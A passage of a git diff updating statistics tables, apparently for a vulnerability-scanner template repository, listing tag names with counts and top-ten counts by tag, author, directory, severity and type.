| | | | | -| mariadb | 1 | | | | | | | | | -| calendarix | 1 | | | | | | | | | -| shiro | 1 | | | | | | | | | -| testrail | 1 | | | | | | | | | -| kyan | 1 | | | | | | | | | -| tensorflow | 1 | | | | | | | | | -| interlib | 1 | | | | | | | | | -| cve2006 | 1 | | | | | | | | | -| zarafa | 1 | | | | | | | | | -| meraki | 1 | | | | | | | | | -| pacsone | 1 | | | | | | | | | -| klog | 1 | | | | | | | | | -| sql | 1 | | | | | | | | | -| gotmls | 1 | | | | | | | | | -| gateone | 1 | | | | | | | | | -| cse | 1 | | | | | | | | | -| esmtp | 1 | | | | | | | | | -| email | 1 | | | | | | | | | -| travis | 1 | | | | | | | | | -| shoppable | 1 | | | | | | | | | -| webadmin | 1 | | | | | | | | | -| rsyncd | 1 | | | | | | | | | -| node-red-dashboard | 1 | | | | | | | | | -| ricoh | 1 | | | | | | | | | -| synnefo | 1 | | | | | | | | | -| sentry | 1 | | | | | | | | | -| gurock | 1 | | | | | | | | | -| gridx | 1 | | | | | | | | | -| memcached | 1 | | | | | | | | | -| nsasg | 1 | | | | | | | | | -| minimouse | 1 | | | | | | | | | -| simplecrm | 1 | | | | | | | | | -| circleci | 1 | | | | | | | | | -| mongo | 1 | | | | | | | | | -| distance | 1 | | | | | | | | | -| vsphere | 1 | | | | | | | | | -| exponentcms | 1 | | | | | | | | | -| xvr | 1 | | | | | | | | | -| shopware | 1 | | | | | | | | | -| pcoip | 1 | | | | | | | | | -| maccmsv10 | 1 | | | | | | | | | -| wildfly | 1 | | | | | | | | | -| key | 1 | | | | | | | | | -| hubspot | 1 | | | | | | | | | -| tinypng | 1 | | | | | | | | | -| aspnuke | 1 | | | | | | | | | -| commscope | 1 | | | | | | | | | -| geddy | 1 | | | | | | | | | -| timesheet | 1 | | | | | | | | | -| iterable | 1 | | | | | | | | | -| viewpoint | 1 | | | | | | | | | -| twitter-server | 1 | | | | | | | | | -| mantis | 1 | | | | | | | | | -| javamelody | 1 | | | | | | | | | -| alibaba | 1 | | | | | | | | | -| wamp | 1 | | | | | | | | | -| qvisdvr | 1 | | | | | | | | | -| limit | 1 | | | | | | | | | -| fiori | 1 | | | | | | | | | -| stem | 1 | | | | | | | | | -| ganglia | 1 | | | | | | | | | -| sendgrid | 1 | | | | | | | | | -| imap | 1 | | | | | | | | | -| labtech | 1 | | | | | | | | | -| xampp | 1 | | | | | | | | | -| jaspersoft | 1 | | | | | | | | | -| openrestry | 1 | | | | | | | | | -| beanshell | 1 | | | | | | | | | -| lg-nas | 1 | | | | | | | | | -| argussurveillance | 1 | | | | | | | | | -| postmark | 1 | | | | | | | | | -| cloudron | 1 | | | | | | | | | -| javafaces | 1 | | | | | | | | | -| sco | 1 | | | | | | | | | -| glances | 1 | | | | | | | | | -| upnp | 1 | | | | | | | | | -| route | 1 | | | | | | | | | -| clockwatch | 1 | | | | | | | | | -| dompdf | 1 | | | | | | | | | -| ruckus | 1 | | | | | | | | | -| fortigates | 1 | | | | | | | | | -| k8s | 1 | | | | | | | | | -| circontrol | 1 | | | | | | | | | -| streetview | 1 | | | | | | | | | -| opencast | 1 | | | | | | | | | -| timezone | 1 | | | | | | | | | -| nerdgraph | 1 | | | | | | | | | -| etouch | 1 | | | | | | | | | -| zyxel | 1 | | | | | | | | | -| expose | 1 | | | | | | | | | -| livezilla | 1 | | | | | | | | | -| nordex | 1 | | | | | | | | | -| darkstat | 1 | | | | | | | | | -| spectracom | 1 | | | | | | | | | -| craftcms | 1 | | | | | | | | | -| dvr | 1 | | | | | | | | | -| zcms | 1 | | | | | | | | | -| zte | 1 | | | | | | | | | -| visualtools | 1 | | | | | | | | | -| lansweeper | 1 | | | | | | | | | -| graylog | 1 | | | | | | | | | -| sqlite | 1 | | | | | | | | | -| springframework | 1 | | | | | | | | | -| acme | 1 | | | | | | | | | -| square | 1 | | | | | | | | | -| geocode | 1 | | | | | | | | | -| find | 1 | | | | | | | | | -| nuuo | 1 | | | | | | | | | -| cscart | 1 | | | | | | | | | -| ecom | 1 | | | | | | | | | -| metabase | 1 | | | | | | | | | -| realteo | 1 | | | | | | | | | -| wmt | 1 | | | | | | | | | -| emby | 1 | | | | | | | | | -| cobub | 1 | | | | | | | | | -| fastcgi | 1 | | | | | | | | | -| jeewms | 1 | | | | | | | | | -| h3c-imc | 1 | | | | | | | | | -| dom | 1 | | | | | | | | | -| hiawatha | 1 | | | | | | | | | -| buttercms | 1 | | | | | | | | | -| circontrorl | 1 | | | | | | | | | -| eg | 1 | | | | | | | | | -| hiboss | 1 | | | | | | | | | -| parentlink | 1 | | | | | | | | | -| diris | 1 | | | | | | | | | -| panasonic | 1 | | | | | | | | | -| yachtcontrol | 1 | | | | | | | | | -| xunchi | 1 | | | | | | | | | -| elevation | 1 | | | | | | | | | -| gstorage | 1 | | | | | | | | | -| photo | 1 | | | | | | | | | -| mobileiron | 1 | | | | | | | | | -| details | 1 | | | | | | | | | -| webui | 1 | | | | | | | | | -| csod | 1 | | | | | | | | | -| centos | 1 | | | | | | | | | -| plugin | 1 | | | | | | | | | -| ssltls | 1 | | | | | | | | | -| robomongo | 1 | | | | | | | | | -| cloudinary | 1 | | | | | | | | | -| wakatime | 1 | | | | | | | | | -| xml | 1 | | | | | | | | | -| panos | 1 | | | | | | | | | -| phpshowtime | 1 | | | | | | | | | -| novnc | 1 | | | | | | | | | -| octobercms | 1 | | | | | | | | | -| flink | 1 | | | | | | | | | -| oidc | 1 | | | | | | | | | -| bedita | 1 | | | | | | | | | -| accela | 1 | | | | | | | | | -| shopxo | 1 | | | | | | | | | -| oscommerce | 1 | | | | | | | | | -| landray | 1 | | | | | | | | | -| adb | 1 | | | | | | | | | -| ems | 1 | | | | | | | | | -| websphere | 1 | | | | | | | | | -| visualstudio | 1 | | | | | | | | | -| sgp | 1 | | | | | | | | | -| visionhub | 1 | | | | | | | | | -| plone | 1 | | | | | | | | | -| kerbynet | 1 | | | | | | | | | | socomec | 1 | | | | | | | | | -| rujjie | 1 | | | | | | | | | +| roads | 1 | | | | | | | | | +| pivotaltracker | 1 | | | | | | | | | +| servicenow | 1 | | | | | | | | | +| linksys | 1 | | | | | | | | | +| jaspersoft | 1 | | | | | | | | | +| messaging | 1 | | | | | | | | | +| sourcebans | 1 | | | | | | | | | +| dvwa | 1 | | | | | | | | | +| nuuo | 1 | | | | | | | | | +| realteo | 1 | | | | | | | | | +| phpshowtime | 1 | | | | | | | | | +| fastcgi | 1 | | | | | | | | | +| default-login | 1 | | | | | | | | | +| flexbe | 1 | | | | | | | | | +| diris | 1 | | | | | | | | | +| travis | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| totaljs | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| burp | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | +| cve2006 | 1 | | | | | | | | | +| playable | 1 | | | | | | | | | +| biometrics | 1 | | | | | | | | | +| panos | 1 | | | | | | | | | +| basic-auth | 1 | | | | | | | | | +| nerdgraph | 1 | | | | | | | | | +| sureline | 1 | | | | | | | | | +| monitorr | 1 | | | | | | | | | +| buttercms | 1 | | | | | | | | | +| square | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | +| robomongo | 1 | | | | | | | | | +| phpwiki | 1 | | | | | | | | | +| redhat | 1 | | | | | | | | | +| panabit | 1 | | | | | | | | | +| websphere | 1 | | | | | | | | | +| tugboat | 1 | | | | | | | | | +| eprints | 1 | | | | | | | | | +| viewpoint | 1 | | | | | | | | | +| default | 1 | | | | | | | | | +| circle | 1 | | | | | | | | | +| distance | 1 | | | | | | | | | +| geutebruck | 1 | | | | | | | | | +| nimble | 1 | | | | | | | | | +| apiman | 1 | | | | | | | | | +| hiawatha | 1 | | | | | | | | | +| etherpad | 1 | | | | | | | | | +| scimono | 1 | | | | | | | | | +| cscart | 1 | | | | | | | | | | blackboard | 1 | | | | | | | | | -| setup | 1 | | | | | | | | | -| subrion | 1 | | | | | | | | | -| azkaban | 1 | | | | | | | | | -| raspap | 1 | | | | | | | | | -| ognl | 1 | | | | | | | | | -| speed | 1 | | | | | | | | | -| vscode | 1 | | | | | | | | | -| zmanda | 1 | | | | | | | | | -| jfrog | 1 | | | | | | | | | -| nps | 1 | | | | | | | | | +| imap | 1 | | | | | | | | | +| bullwark | 1 | | | | | | | | | +| primetek | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| weiphp | 1 | | | | | | | | | +| mirai | 1 | | | | | | | | | +| krweb | 1 | | | | | | | | | +| shopware | 1 | | | | | | | | | +| oneblog | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | +| lotuscms | 1 | | | | | | | | | +| lutron | 1 | | | | | | | | | +| empirecms | 1 | | | | | | | | | +| zzzcms | 1 | | | | | | | | | +| adiscon | 1 | | | | | | | | | +| cloudflare | 1 | | | | | | | | | +| sophos | 1 | | | | | | | | | +| cherokee | 1 | | | | | | | | | +| pgadmin | 1 | | | | | | | | | +| lg-nas | 1 | | | | | | | | | +| aura | 1 | | | | | | | | | +| hadoop | 1 | | | | | | | | | +| tamronos | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| wakatime | 1 | | | | | | | | | +| codeigniter | 1 | | | | | | | | | +| openstack | 1 | | | | | | | | | +| find | 1 | | | | | | | | | +| postgres | 1 | | | | | | | | | +| opensns | 1 | | | | | | | | | +| ipstack | 1 | | | | | | | | | +| ntopng | 1 | | | | | | | | | +| twitter | 1 | | | | | | | | | +| gstorage | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| argussurveillance | 1 | | | | | | | | | +| myvuehelp | 1 | | | | | | | | | +| dropbox | 1 | | | | | | | | | +| spring | 1 | | | | | | | | | +| fortigates | 1 | | | | | | | | | +| zte | 1 | | | | | | | | | +| zeroshell | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | +| terraform | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| magicflow | 1 | | | | | | | | | +| locations | 1 | | | | | | | | | +| graphql | 1 | | | | | | | | | | vnc | 1 | | | | | | | | | +| redcap | 1 | | | | | | | | | +| javamelody | 1 | | | | | | | | | +| yzmcms | 1 | | | | | | | | | +| accela | 1 | | | | | | | | | +| exacqvision | 1 | | | | | | | | | +| rabbitmq | 1 | | | | | | | | | +| zcms | 1 | | | | | | | | | +| ueditor | 1 | | | | | | | | | +| okta | 1 | | | | | | | | | +| darkstat | 1 | | | | | | | | | +| bedita | 1 | | | | | | | | | +| raspap | 1 | | | | | | | | | +| ssl | 1 | | | | | | | | | +| clink-office | 1 | | | | | | | | | +| plc | 1 | | | | | | | | | +| openrestry | 1 | | | | | | | | | +| elfinder | 1 | | | | | | | | | +| haproxy | 1 | | | | | | | | | +| svnserve | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| wifisky | 1 | | | | | | | | | +| fortilogger | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| zms | 1 | | | | | | | | | +| processmaker | 1 | | | | | | | | | +| fortiweb | 1 | | | | | | | | | +| asus | 1 | | | | | | | | | +| kafdrop | 1 | | | | | | | | | +| gsoap | 1 | | | | | | | | | +| clockwork | 1 | | | | | | | | | +| drone | 1 | | | | | | | | | +| dom | 1 | | | | | | | | | +| clockwatch | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| opensmtpd | 1 | | | | | | | | | +| database | 1 | | | | | | | | | +| qsan | 1 | | | | | | | | | +| azkaban | 1 | | | | | | | | | +| mongoshake | 1 | | | | | | | | | +| email | 1 | | | | | | | | | +| netgenie | 1 | | | | | | | | | +| qvisdvr | 1 | | | | | | | | | +| qdpm | 1 | | | | | | | | | +| netrc | 1 | | | | | | | | | +| tor | 1 | | | | | | | | | +| blind | 1 | | | | | | | | | +| livezilla | 1 | | | | | | | | | +| ruckus | 1 | | | | | | | | | +| streetview | 1 | | | | | | | | | +| jumpcloud | 1 | | | | | | | | | +| auth | 1 | | | | | | | | | +| phalcon | 1 | | | | | | | | | +| swagger | 1 | | | | | | | | | +| postmark | 1 | | | | | | | | | +| openx | 1 | | | | | | | | | +| mantisbt | 1 | | | | | | | | | +| fastapi | 1 | | | | | | | | | +| pagerduty | 1 | | | | | | | | | +| perl | 1 | | | | | | | | | +| ganglia | 1 | | | | | | | | | +| nsasg | 1 | | | | | | | | | +| webmodule-ee | 1 | | | | | | | | | +| ilo4 | 1 | | | | | | | | | +| beanstalk | 1 | | | | | | | | | +| gogs | 1 | | | | | | | | | +| stem | 1 | | | | | | | | | +| beanshell | 1 | | | | | | | | | +| elasticsearch | 1 | | | | | | | | | +| pippoint | 1 | | | | | | | | | +| openweather | 1 | | | | | | | | | +| zenario | 1 | | | | | | | | | +| matrix | 1 | | | | | | | | | +| geolocation | 1 | | | | | | | | | +| powercreator | 1 | | | | | | | | | +| opentsdb | 1 | | | | | | | | | +| mobileiron | 1 | | | | | | | | | +| faraday | 1 | | | | | | | | | +| circleci | 1 | | | | | | | | | +| szhe | 1 | | | | | | | | | +| wazuh | 1 | | | | | | | | | +| cloudron | 1 | | | | | | | | | +| spotify | 1 | | | | | | | | | +| natemail | 1 | | | | | | | | | +| fortinet | 1 | | | | | | | | | +| miscrsoft | 1 | | | | | | | | | +| tieline | 1 | | | | | | | | | +| jnoj | 1 | | | | | | | | | +| speed | 1 | | | | | | | | | +| simplecrm | 1 | | | | | | | | | +| artica | 1 | | | | | | | | | +| directions | 1 | | | | | | | | | +| pulsesecure | 1 | | | | | | | | | +| jfrog | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| centreon | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| webmin | 1 | | | | | | | | | +| shoretel | 1 | | | | | | | | | +| selea | 1 | | | | | | | | | +| photo | 1 | | | | | | | | | +| avalanche | 1 | | | | | | | | | +| maxsite | 1 | | | | | | | | | +| node-red-dashboard | 1 | | | | | | | | | +| bigbluebutton | 1 | | | | | | | | | +| dotnetnuke | 1 | | | | | | | | | +| flink | 1 | | | | | | | | | +| extractor | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| shoppable | 1 | | | | | | | | | +| wiki | 1 | | | | | | | | | +| doh | 1 | | | | | | | | | +| octobercms | 1 | | | | | | | | | +| gilacms | 1 | | | | | | | | | +| commscope | 1 | | | | | | | | | +| package | 1 | | | | | | | | | +| zm | 1 | | | | | | | | | +| office365 | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | +| seacms | 1 | | | | | | | | | +| fuelcms | 1 | | | | | | | | | +| csrf | 1 | | | | | | | | | +| cofax | 1 | | | | | | | | | +| openerp | 1 | | | | | | | | | +| servicedesk | 1 | | | | | | | | | +| mailgun | 1 | | | | | | | | | +| avtech | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| octoprint | 1 | | | | | | | | | +| ssltls | 1 | | | | | | | | | +| hiboss | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| dotclear | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| cocoon | 1 | | | | | | | | | +| lancom | 1 | | | | | | | | | +| svn | 1 | | | | | | | | | +| frontpage | 1 | | | | | | | | | +| h3c-imc | 1 | | | | | | | | | +| gloo | 1 | | | | | | | | | +| landray | 1 | | | | | | | | | +| postmessage | 1 | | | | | | | | | +| solman | 1 | | | | | | | | | +| trane | 1 | | | | | | | | | +| checkpoint | 1 | | | | | | | | | +| panasonic | 1 | | | | | | | | | +| mpsec | 1 | | | | | | | | | +| eyou | 1 | | | | | | | | | +| moinmoin | 1 | | | | | | | | | +| woocommerce | 1 | | | | | | | | | +| fcm | 1 | | | | | | | | | +| alibaba | 1 | | | | | | | | | +| netdata | 1 | | | | | | | | | +| omi | 1 | | | | | | | | | +| resourcespace | 1 | | | | | | | | | +| bazarr | 1 | | | | | | | | | +| embedthis | 1 | | | | | | | | | +| motorola | 1 | | | | | | | | | +| sar2html | 1 | | | | | | | | | +| feifeicms | 1 | | | | | | | | | +| rmi | 1 | | | | | | | | | +| kubeflow | 1 | | | | | | | | | +| limit | 1 | | | | | | | | | +| tapestry | 1 | | | | | | | | | +| smartblog | 1 | | | | | | | | | +| bingmaps | 1 | | | | | | | | | +| weglot | 1 | | | | | | | | | +| javafaces | 1 | | | | | | | | | +| digitalocean | 1 | | | | | | | | | +| soar | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| monitorix | 1 | | | | | | | | | +| pendo | 1 | | | | | | | | | +| tensorflow | 1 | | | | | | | | | +| 74cms | 1 | | | | | | | | | +| pihole | 1 | | | | | | | | | +| scs | 1 | | | | | | | | | +| rockethchat | 1 | | | | | | | | | +| phpfastcache | 1 | | | | | | | | | +| adb | 1 | | | | | | | | | +| mrtg | 1 | | | | | | | | | +| turbocrm | 1 | | | | | | | | | +| tjws | 1 | | | | | | | | | +| setup | 1 | | | | | | | | | +| clickhouse | 1 | | | | | | | | | +| dbeaver | 1 | | | | | | | | | +| comodo | 1 | | | | | | | | | +| cloudinary | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| novnc | 1 | | | | | | | | | +| loqate | 1 | | | | | | | | | +| proftpd | 1 | | | | | | | | | +| opm | 1 | | | | | | | | | +| subrion | 1 | | | | | | | | | +| tenda | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| jenzabar | 1 | | | | | | | | | +| youtube | 1 | | | | | | | | | +| gateone | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| sage | 1 | | | | | | | | | +| circontrorl | 1 | | | | | | | | | +| mediumish | 1 | | | | | | | | | +| acexy | 1 | | | | | | | | | +| chinaunicom | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| csod | 1 | | | | | | | | | +| iterable | 1 | | | | | | | | | +| shopxo | 1 | | | | | | | | | +| olivetti | 1 | | | | | | | | | +| kindeditor | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | +| anchorcms | 1 | | | | | | | | | +| asana | 1 | | | | | | | | | +| cves2001 | 1 | | | | | | | | | +| traefik | 1 | | | | | | | | | +| spf | 1 | | | | | | | | | +| gotmls | 1 | | | | | | | | | +| karel | 1 | | | | | | | | | +| bing | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | +| testrail | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| ewebs | 1 | | | | | | | | | +| sql | 1 | | | | | | | | | +| graylog | 1 | | | | | | | | | +| concrete | 1 | | | | | | | | | +| ognl | 1 | | | | | | | | | +| contentkeeper | 1 | | | | | | | | | +| tcexam | 1 | | | | | | | | | +| sentry | 1 | | | | | | | | | +| elascticsearch | 1 | | | | | | | | | +| csrfguard | 1 | | | | | | | | | +| domxss | 1 | | | | | | | | | +| cockpit | 1 | | | | | | | | | +| owasp | 1 | | | | | | | | | +| opencast | 1 | | | | | | | | | +| eyelock | 1 | | | | | | | | | +| zend | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| iceflow | 1 | | | | | | | | | +| centos | 1 | | | | | | | | | +| daybyday | 1 | | | | | | | | | +| redmine | 1 | | | | | | | | | +| memcached | 1 | | | | | | | | | +| hubspot | 1 | | | | | | | | | +| smartsense | 1 | | | | | | | | | +| acontent | 1 | | | | | | | | | +| circontrol | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| pagespeed | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | +| mara | 1 | | | | | | | | | +| zarafa | 1 | | | | | | | | | +| dvr | 1 | | | | | | | | | +| ems | 1 | | | | | | | | | +| timezone | 1 | | | | | | | | | +| xunchi | 1 | | | | | | | | | +| blue-ocean | 1 | | | | | | | | | +| cyberoam | 1 | | | | | | | | | +| sco | 1 | | | | | | | | | +| netmask | 1 | | | | | | | | | +| razor | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| pyramid | 1 | | | | | | | | | +| erp-nc | 1 | | | | | | | | | +| rocketchat | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| sonarcloud | 1 | | | | | | | | | +| nearby | 1 | | | | | | | | | +| announcekit | 1 | | | | | | | | | +| gespage | 1 | | | | | | | | | +| visualstudio | 1 | | | | | | | | | +| rdp | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| discourse | 1 | | | | | | | | | +| vidyo | 1 | | | | | | | | | +| webadmin | 1 | | | | | | | | | +| achecker | 1 | | | | | | | | | +| kyan | 1 | | | | | | | | | +| jquery | 1 | | | | | | | | | +| visionhub | 1 | | | | | | | | | +| ambari | 1 | | | | | | | | | +| instagram | 1 | | | | | | | | | +| fiori | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| websvn | 1 | | | | | | | | | +| logontracer | 1 | | | | | | | | | +| xmlchart | 1 | | | | | | | | | +| dnssec | 1 | | | | | | | | | +| details | 1 | | | | | | | | | +| woocomernce | 1 | | | | | | | | | +| huijietong | 1 | | | | | | | | | +| twitter-server | 1 | | | | | | | | | +| wamp | 1 | | | | | | | | | +| tinypng | 1 | | | | | | | | | +| tectuus | 1 | | | | | | | | | +| deviantart | 1 | | | | | | | | | +| spidercontrol | 1 | | | | | | | | | +| portainer | 1 | | | | | | | | | +| key | 1 | | | | | | | | | +| iptime | 1 | | | | | | | | | +| solarlog | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| dotnet | 1 | | | | | | | | | +| sgp | 1 | | | | | | | | | +| axiom | 1 | | | | | | | | | +| ruby | 1 | | | | | | | | | +| shopizer | 1 | | | | | | | | | +| openemr | 1 | | | | | | | | | +| pmb | 1 | | | | | | | | | +| nuxeo | 1 | | | | | | | | | +| bolt | 1 | | | | | | | | | +| jenkin | 1 | | | | | | | | | +| cve202 | 1 | | | | | | | | | +| nifi | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| buildkite | 1 | | | | | | | | | +| sprintful | 1 | | | | | | | | | +| secmail | 1 | | | | | | | | | +| place | 1 | | | | | | | | | +| interlib | 1 | | | | | | | | | +| trilithic | 1 | | | | | | | | | +| pcoip | 1 | | | | | | | | | +| shiro | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| idemia | 1 | | | | | | | | | +| metinfo | 1 | | | | | | | | | +| emc | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | +| myucms | 1 | | | | | | | | | +| yealink | 1 | | | | | | | | | +| glances | 1 | | | | | | | | | +| loganalyzer | 1 | | | | | | | | | +| tpshop | 1 | | | | | | | | | +| remkon | 1 | | | | | | | | | +| phpinfo | 1 | | | | | | | | | +| episerver | 1 | | | | | | | | | +| eg | 1 | | | | | | | | | +| triconsole | 1 | | | | | | | | | +| metabase | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| xampp | 1 | | | | | | | | | +| okiko | 1 | | | | | | | | | +| plugin | 1 | | | | | | | | | +| finereport | 1 | | | | | | | | | +| tensorboard | 1 | | | | | | | | | +| nweb2fax | 1 | | | | | | | | | +| mkdocs | 1 | | | | | | | | | +| calendarix | 1 | | | | | | | | | +| jmx | 1 | | | | | | | | | +| smi | 1 | | | | | | | | | +| wondercms | 1 | | | | | | | | | +| etouch | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| clave | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | +| kerbynet | 1 | | | | | | | | | +| st | 1 | | | | | | | | | +| grails | 1 | | | | | | | | | +| aspnuke | 1 | | | | | | | | | +| sangfor | 1 | | | | | | | | | +| duomicms | 1 | | | | | | | | | +| actuator | 1 | | | | | | | | | +| autocomplete | 1 | | | | | | | | | +| zmanda | 1 | | | | | | | | | +| mongo | 1 | | | | | | | | | +| luftguitar | 1 | | | | | | | | | +| redis | 1 | | | | | | | | | +| craftcms | 1 | | | | | | | | | +| nordex | 1 | | | | | | | | | +| expn | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| mantis | 1 | | | | | | | | | +| jsp | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| b2evolution | 1 | | | | | | | | | +| rsyncd | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| bash | 1 | | | | | | | | | +| phpfusion | 1 | | | | | | | | | +| meraki | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| zyxel | 1 | | | | | | | | | +| vscode | 1 | | | | | | | | | +| discord | 1 | | | | | | | | | +| tracer | 1 | | | | | | | | | +| cgi | 1 | | | | | | | | | +| sceditor | 1 | | | | | | | | | +| froxlor | 1 | | | | | | | | | +| timeclock | 1 | | | | | | | | | +| k8s | 1 | | | | | | | | | +| cse | 1 | | | | | | | | | +| influxdb | 1 | | | | | | | | | +| plastic | 1 | | | | | | | | | +| webui | 1 | | | | | | | | | +| whm | 1 | | | | | | | | | +| manager | 1 | | | | | | | | | +| rujjie | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| acme | 1 | | | | | | | | | +| graph | 1 | | | | | | | | | +| sidekiq | 1 | | | | | | | | | +| linkedin | 1 | | | | | | | | | +| xml | 1 | | | | | | | | | +| exponentcms | 1 | | | | | | | | | +| wildfly | 1 | | | | | | | | | +| nps | 1 | | | | | | | | | +| mariadb | 1 | | | | | | | | | +| crm | 1 | | | | | | | | | +| wing-ftp | 1 | | | | | | | | | +| camunda | 1 | | | | | | | | | +| mod-proxy | 1 | | | | | | | | | +| ioncube | 1 | | | | | | | | | +| calendly | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| tongda | 1 | | | | | | | | | +| expressjs | 1 | | | | | | | | | +| pacsone | 1 | | | | | | | | | +| upnp | 1 | | | | | | | | | +| wooyun | 1 | | | | | | | | | +| uwsgi | 1 | | | | | | | | | +| javascript | 1 | | | | | | | | | +| emby | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| addpac | 1 | | | | | | | | | +| chevereto | 1 | | | | | | | | | +| lighttpd | 1 | | | | | | | | | +| api-manager | 1 | | | | | | | | | +| phpunit | 1 | | | | | | | | | +| gurock | 1 | | | | | | | | | +| expose | 1 | | | | | | | | | +| mapbox | 1 | | | | | | | | | +| gitlist | 1 | | | | | | | | | +| graphite | 1 | | | | | | | | | +| apos | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| visualtools | 1 | | | | | | | | | +| cerebro | 1 | | | | | | | | | +| weather | 1 | | | | | | | | | +| springframework | 1 | | | | | | | | | +| gunicorn | 1 | | | | | | | | | +| gitea | 1 | | | | | | | | | +| placeos | 1 | | | | | | | | | +| spip | 1 | | | | | | | | | +| listserv | 1 | | | | | | | | | +| couchbase | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| wavlink | 1 | | | | | | | | | +| nette | 1 | | | | | | | | | +| mautic | 1 | | | | | | | | | +| xvr | 1 | | | | | | | | | +| geocode | 1 | | | | | | | | | +| owa | 1 | | | | | | | | | +| minimouse | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | +| route | 1 | | | | | | | | | +| clusterengine | 1 | | | | | | | | | +| ghost | 1 | | | | | | | | | +| mdb | 1 | | | | | | | | | +| sqlite | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| xiuno | 1 | | | | | | | | | +| thinkadmin | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| stripe | 1 | | | | | | | | | +| salesforce | 1 | | | | | | | | | +| glowroot | 1 | | | | | | | | | +| sendgrid | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| newrelic | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| tileserver | 1 | | | | | | | | | +| werkzeug | 1 | | | | | | | | | +| oidc | 1 | | | | | | | | | +| elevation | 1 | | | | | | | | | +| syslog | 1 | | | | | | | | | +| codemeter | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index ec2b8d5aad..e941b1bca2 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 818 | daffainfo | 285 | cves | 821 | info | 733 | http | 2164 | -| lfi | 330 | pikpikcu | 279 | vulnerabilities | 316 | high | 632 | file | 49 | -| panel | 259 | dhiyaneshdk | 268 | exposed-panels | 255 | medium | 471 | network | 45 | -| xss | 256 | pdteam | 201 | technologies | 201 | critical | 284 | dns | 12 | -| wordpress | 245 | geeknik | 159 | exposures | 191 | low | 155 | | | -| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 137 | | | | | -| rce | 204 | gy741 | 81 | takeovers | 65 | | | | | -| tech | 193 | pussycat0x | 72 | token-spray | 63 | | | | | -| wp-plugin | 170 | princechaddha | 64 | default-logins | 58 | | | | | -| cve2020 | 164 | madrobot | 63 | file | 49 | | | | | +| cve | 827 | daffainfo | 288 | cves | 831 | info | 743 | http | 2195 | +| lfi | 337 | pikpikcu | 280 | vulnerabilities | 324 | high | 641 | file | 50 | +| panel | 267 | dhiyaneshdk | 273 | exposed-panels | 264 | medium | 474 | network | 45 | +| xss | 258 | pdteam | 201 | technologies | 201 | critical | 294 | dns | 12 | +| wordpress | 249 | geeknik | 162 | exposures | 191 | low | 155 | | | +| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 139 | | | | | +| rce | 212 | gy741 | 81 | takeovers | 65 | | | | | +| tech | 195 | pussycat0x | 72 | token-spray | 63 | | | | | +| wp-plugin | 172 | princechaddha | 66 | default-logins | 60 | | | | | +| cve2020 | 164 | madrobot | 63 | file | 50 | | | | | From 